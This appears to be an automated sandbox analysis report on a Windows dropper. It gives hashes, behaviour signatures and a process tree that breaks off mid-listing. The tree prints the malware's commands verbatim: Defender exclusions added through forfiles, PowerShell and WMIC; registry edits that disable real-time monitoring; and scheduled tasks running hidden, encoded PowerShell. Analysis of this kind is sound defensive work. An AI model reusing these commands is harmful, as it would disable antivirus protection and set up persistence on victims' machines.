Analysis

  • max time kernel
    135s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    25/07/2024, 22:45

General

  • Target

    a006394a779ca5bbf1be3b21c7ca213bc4603e5407286295d4c69258c4c16844.exe

  • Size

    7.3MB

  • MD5

    e3acea0543ee4583576a61f6568d3216

  • SHA1

    c547db3b84ddf664ae6219566b92d6e18430a201

  • SHA256

    a006394a779ca5bbf1be3b21c7ca213bc4603e5407286295d4c69258c4c16844

  • SHA512

    49f9a2c5a3bff68d97a59cbdfa33188f6d354a19db980e851a3afb7a8f902e43a0ec334c2e2a586e32653765ad0b04789d7a94b6f5b3b702e0f307ab836ba927

  • SSDEEP

    196608:91ObnoYIi4Yoiz2JYjhXDL1OTDG2xhM9XBp0Hm6ieyHuEKK:3OboYFNzOY1qG2M3msvb

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 4 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 24 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a006394a779ca5bbf1be3b21c7ca213bc4603e5407286295d4c69258c4c16844.exe
    "C:\Users\Admin\AppData\Local\Temp\a006394a779ca5bbf1be3b21c7ca213bc4603e5407286295d4c69258c4c16844.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2112
    • C:\Users\Admin\AppData\Local\Temp\7zS9109.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1956
      • C:\Users\Admin\AppData\Local\Temp\7zS9685.tmp\Install.exe
        .\Install.exe /YWdidoXJ "385132" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2904
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2752
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2912
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2612
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2624
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "brlRsAdJaeHYbaQPPR" /SC once /ST 22:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI\yZPQseHoxDEsjfC\JAiOvws.exe\" NQ /WGYtdidbl 385132 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:2468
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 520
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1620
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {9B788A1B-5EC7-4D3A-AED4-67446F1CFE7E} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2560
    • C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI\yZPQseHoxDEsjfC\JAiOvws.exe
      C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI\yZPQseHoxDEsjfC\JAiOvws.exe NQ /WGYtdidbl 385132 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gEXXwncGD" /SC once /ST 16:13:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2336
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gEXXwncGD"
        3⤵
          PID:2360
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gEXXwncGD"
          3⤵
            PID:2200
          • C:\Windows\SysWOW64\cmd.exe
            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1076
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
              4⤵
              • Modifies Windows Defender Real-time Protection settings
              • System Location Discovery: System Language Discovery
              PID:2076
          • C:\Windows\SysWOW64\cmd.exe
            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
            3⤵
            • System Location Discovery: System Language Discovery
            PID:952
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
              4⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:1160
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /CREATE /TN "gOdRujgMV" /SC once /ST 09:55:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1196
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /run /I /tn "gOdRujgMV"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2028
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /DELETE /F /TN "gOdRujgMV"
            3⤵
              PID:1484
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
              3⤵
              • Indirect Command Execution
              PID:1500
              • C:\Windows\SysWOW64\cmd.exe
                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                4⤵
                • System Location Discovery: System Language Discovery
                PID:740
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:860
                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                    6⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1644
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUEvGNAcZIxQcBNL" /t REG_DWORD /d 0 /reg:32
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2148
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUEvGNAcZIxQcBNL" /t REG_DWORD /d 0 /reg:32
                4⤵
                • Windows security bypass
                • System Location Discovery: System Language Discovery
                PID:2720
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUEvGNAcZIxQcBNL" /t REG_DWORD /d 0 /reg:64
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2848
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUEvGNAcZIxQcBNL" /t REG_DWORD /d 0 /reg:64
                4⤵
                • Windows security bypass
                • System Location Discovery: System Language Discovery
                PID:2844
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUEvGNAcZIxQcBNL" /t REG_DWORD /d 0 /reg:32
              3⤵
                PID:2764
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUEvGNAcZIxQcBNL" /t REG_DWORD /d 0 /reg:32
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2396
              • C:\Windows\SysWOW64\cmd.exe
                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUEvGNAcZIxQcBNL" /t REG_DWORD /d 0 /reg:64
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2796
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUEvGNAcZIxQcBNL" /t REG_DWORD /d 0 /reg:64
                  4⤵
                    PID:2740
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /C copy nul "C:\Windows\Temp\yUEvGNAcZIxQcBNL\umZCaXdi\eOCiWVPVqvRUDfFl.wsf"
                  3⤵
                    PID:2676
                  • C:\Windows\SysWOW64\wscript.exe
                    wscript "C:\Windows\Temp\yUEvGNAcZIxQcBNL\umZCaXdi\eOCiWVPVqvRUDfFl.wsf"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:3012
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:32
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:2620
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:64
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:2732
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHBoolplFmUn" /t REG_DWORD /d 0 /reg:32
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:2912
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHBoolplFmUn" /t REG_DWORD /d 0 /reg:64
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:1516
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OfCUcdUmBfXwC" /t REG_DWORD /d 0 /reg:32
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:1724
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OfCUcdUmBfXwC" /t REG_DWORD /d 0 /reg:64
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:1532
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QAWIpintGGMU2" /t REG_DWORD /d 0 /reg:32
                      4⤵
                      • Windows security bypass
                      PID:2528
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QAWIpintGGMU2" /t REG_DWORD /d 0 /reg:64
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:1648
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cIeibrkhU" /t REG_DWORD /d 0 /reg:32
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:2908
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cIeibrkhU" /t REG_DWORD /d 0 /reg:64
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:3064
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\GnOWEelXRQHUOVVB" /t REG_DWORD /d 0 /reg:32
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:920
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\GnOWEelXRQHUOVVB" /t REG_DWORD /d 0 /reg:64
                      4⤵
                      • Windows security bypass
                      PID:2336
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:1928
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                      4⤵
                      • Windows security bypass
                      PID:2116
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI" /t REG_DWORD /d 0 /reg:32
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:2884
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI" /t REG_DWORD /d 0 /reg:64
                      4⤵
                      • Windows security bypass
                      PID:1480
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUEvGNAcZIxQcBNL" /t REG_DWORD /d 0 /reg:32
                      4⤵
                      • Windows security bypass
                      • System Location Discovery: System Language Discovery
                      PID:2404
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUEvGNAcZIxQcBNL" /t REG_DWORD /d 0 /reg:64
                      4⤵
                      • Windows security bypass
                      PID:2368
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:32
                      4⤵
                        PID:1940
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:64
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:1944
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHBoolplFmUn" /t REG_DWORD /d 0 /reg:32
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:2188
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHBoolplFmUn" /t REG_DWORD /d 0 /reg:64
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:940
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OfCUcdUmBfXwC" /t REG_DWORD /d 0 /reg:32
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:560
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OfCUcdUmBfXwC" /t REG_DWORD /d 0 /reg:64
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:324
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QAWIpintGGMU2" /t REG_DWORD /d 0 /reg:32
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:1528
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QAWIpintGGMU2" /t REG_DWORD /d 0 /reg:64
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:2792
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cIeibrkhU" /t REG_DWORD /d 0 /reg:32
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:1096
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cIeibrkhU" /t REG_DWORD /d 0 /reg:64
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:1688
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\GnOWEelXRQHUOVVB" /t REG_DWORD /d 0 /reg:32
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:1776
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\GnOWEelXRQHUOVVB" /t REG_DWORD /d 0 /reg:64
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:2128
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:2872
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                        4⤵
                          PID:3008
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI" /t REG_DWORD /d 0 /reg:32
                          4⤵
                            PID:3048
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI" /t REG_DWORD /d 0 /reg:64
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:2204
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUEvGNAcZIxQcBNL" /t REG_DWORD /d 0 /reg:32
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:1248
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yUEvGNAcZIxQcBNL" /t REG_DWORD /d 0 /reg:64
                            4⤵
                              PID:332
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /CREATE /TN "gOsEoGeLL" /SC once /ST 10:24:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                            3⤵
                            • System Location Discovery: System Language Discovery
                            • Scheduled Task/Job: Scheduled Task
                            PID:2540
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /run /I /tn "gOsEoGeLL"
                            3⤵
                              PID:2236
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /DELETE /F /TN "gOsEoGeLL"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2796
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2248
                              • C:\Windows\SysWOW64\reg.exe
                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:2688
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                              3⤵
                                PID:2612
                                • C:\Windows\SysWOW64\reg.exe
                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                  4⤵
                                    PID:1836
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "ThIGDFyeJlwCieRpK" /SC once /ST 08:51:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\yUEvGNAcZIxQcBNL\OmPTzRUvSQeiqFE\BWEDOHO.exe\" Dw /dTnldidfj 385132 /S" /V1 /F
                                  3⤵
                                  • Drops file in Windows directory
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2732
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "ThIGDFyeJlwCieRpK"
                                  3⤵
                                    PID:2868
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3028 -s 476
                                    3⤵
                                    • Loads dropped DLL
                                    • Program crash
                                    PID:1988
                                • C:\Windows\Temp\yUEvGNAcZIxQcBNL\OmPTzRUvSQeiqFE\BWEDOHO.exe
                                  C:\Windows\Temp\yUEvGNAcZIxQcBNL\OmPTzRUvSQeiqFE\BWEDOHO.exe Dw /dTnldidfj 385132 /S
                                  2⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Drops Chrome extension
                                  • Drops file in System32 directory
                                  • Drops file in Program Files directory
                                  • System Location Discovery: System Language Discovery
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1148
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "brlRsAdJaeHYbaQPPR"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2384
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                    3⤵
                                      PID:928
                                      • C:\Windows\SysWOW64\forfiles.exe
